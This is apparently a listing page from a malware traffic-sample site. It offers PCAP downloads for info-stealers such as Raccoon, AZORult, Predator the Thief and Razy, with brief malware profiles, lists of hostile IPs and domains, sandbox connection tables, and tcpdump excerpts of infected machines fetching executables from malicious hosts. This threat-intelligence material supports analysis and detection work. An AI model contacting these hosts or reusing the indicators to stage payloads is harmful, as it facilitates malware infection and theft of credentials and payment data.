AsyncRAT RacoonStealer tunnabelly.ug jamshed.pk vbchjfssdfcxbcver.ru thompson.ug PCAP Traffic Sample File Download

2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1
GET /zxcv.EXE HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=90210-
Unless-Modified-Since: Sat, 20 Jun 2020 15:23:12 GMT
If-Range: "177000-5a8859680d070"
Host: jamshed.pk
Connection: Keep-Alive
2020-06-23 15:26:21.594726 IP 10.1.10.15.49724 > 64.31.23.18.80: Flags [.], ack 50, win 16363, length 0
2020-06-23 15:26:21.673543 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], ack 502, win […]

AZORult RacoonStealer Banking Malware Crypto miner PCAP File Download Traffic Sample

AZORult/RacoonStealer can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer should not be taken lightly, as it continues to be an active threat. Raccoon is an info stealer type malware available as Malware as a Service: it can be obtained on a subscription basis and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on underground forums in 2019.
Type: Stealer
Origin: ex-USSR
Raccoon malware comes with fairly basic info stealer functions and by itself lacks any kind of […]

PredatorTheThief TaurusStealer Predator Stealer Malware PCAP File Download Traffic Sample dllhost.exe toeghaiofiehfihf.ws

Predator the Thief is an information stealer, meaning that it is malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information, and retrieve payment data from cryptocurrency wallets.
Type: Stealer
Origin: ex-USSR
First seen: 1 July, 2018
Last seen: 29 May, 2020
Connections
PID   Process      IP                   ASN                  CN   Reputation
2492  uplads.exe   185.136.169.150:80                        DE   malicious
2576  MSIE711.tmp  88.99.66.31:443      Hetzner Online GmbH  DE   malicious
932   dllhost.exe  217.8.117.63:80      –                    –    malicious
DNS requests
Domain        IP           Reputation
iplogger.org  88.99.66.31  shared
Threats
PID   Process     Class                          Message
2492  uplads.exe  A Network Trojan was detected  STEALER [PTsecurity] […]

Racoon Crimeware Malware PCAP File Download AZORult MSILPerseus tribunal.ug

Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64
Dynamic Analysis Report
Classification: Downloader, Spyware
Threat Names: AZORult v3; Gen:Variant.MSILPerseus.224291; Trojan.GenericKD.42815195
2020-05-29 20:39:31.460098 IP 10.1.10.15.49233 > 217.8.117.45.80: Flags [P.], seq 1:504, ack 1, win 16425, length 503: HTTP: GET /zxcvb.exe HTTP/1.1
GET /zxcvb.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=101892-
Unless-Modified-Since: Wed, 27 May 2020 16:24:13 GMT
If-Range: "43200-5a6a3a481cf60"
Host: tribunal.ug
Connection: Keep-Alive
2020-05-29 20:39:31.615857 IP 217.8.117.45.80 > 10.1.10.15.49233: Flags [.], […]

Razy Malware Crimeware PCAP File Download Traffic Analysis system.exe gasfer.ru

The malware downloads and loads the dropper from 64.31.23.26, but that host is down, so execution dies at this point.
Hostile IPs: 64.31.23.26 81.177.135.143
2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win 16425, length 393: HTTP: GET /system.exe HTTP/1.1
GET /system.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gasfer.ru
Connection: Keep-Alive
2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0 […]